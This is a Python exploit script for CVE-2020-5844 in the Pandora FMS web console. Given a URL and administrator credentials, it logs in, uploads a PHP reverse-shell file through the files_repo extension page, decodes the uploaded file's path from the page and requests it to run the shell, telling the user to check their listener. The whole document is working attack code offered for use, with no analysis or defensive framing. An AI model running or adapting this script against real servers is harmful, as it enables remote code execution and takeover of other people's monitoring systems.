import requests
import re
import sys
import urllib.parse
import base64
################################################
#           Script by TheCyberGeek             #
#         Discovered by TheCyberGeek           #
#                                              #
# Start Listener before starting this exploit! #
################################################

if len(sys.argv) < 4:
    print("""
Usage: python3 CVE-2020-5844.py URL USER PASS PHP_REVERSE_SHELL
Ex: python3 CVE-2020-5844.py http://10.0.0.2/pandora_console admin pandora reverse.php
    """)
    sys.exit(0)
else:
    base_path, username, password, rev = sys.argv[1], sys.argv[2], sys.argv[3], sys.argv[4],
    s = requests.Session()
    f = s.post(base_path + "/index.php?login=1", data={"nick": username, "pass": password, "login_button": "login"})
    if "Logout" in f.text:
        print("[ + ] Logged in!")
        file_ = {'upfile': (rev, open(rev, 'rb'), 'application/x-php')}
        t = s.get(base_path + "/index.php?sec=godmode/extensions&sec2=extensions/files_repo")
        t = s.post(base_path + "/index.php?sec=godmode/extensions&sec2=extensions/files_repo", files=file_, data={"add_file": 1})
        if rev in t.text:
            print("[ + ] Great. PHP script uploaded... Now going to execute for you...")
            m = re.search(r"^<td id=\"table2.*?\".*?href=\".*?get_file\.php\?file=(.*?)&hash=(.*?)\" target((?!img).)*$", t.text, re.MULTILINE)
            if m:
                base_location = m.group(1)
                base64_bytes = base_location.encode('ascii')
                message_bytes = base64.b64decode(base64_bytes)
                file_location = message_bytes.decode('ascii')
                x = file_location.replace("/pandora_console", "")
                try:
                    print("[ + ] Shell received. Check your listener!")
                    f = s.get(base_path + x, timeout=0.0000000001)
                except requests.exceptions.ReadTimeout:
                    pass
        else:
            print("[ - ] Failed to upload PHP script...")
            print(t.text)
    else:
        print("[ - ] Cannot login to PandoraFMS...")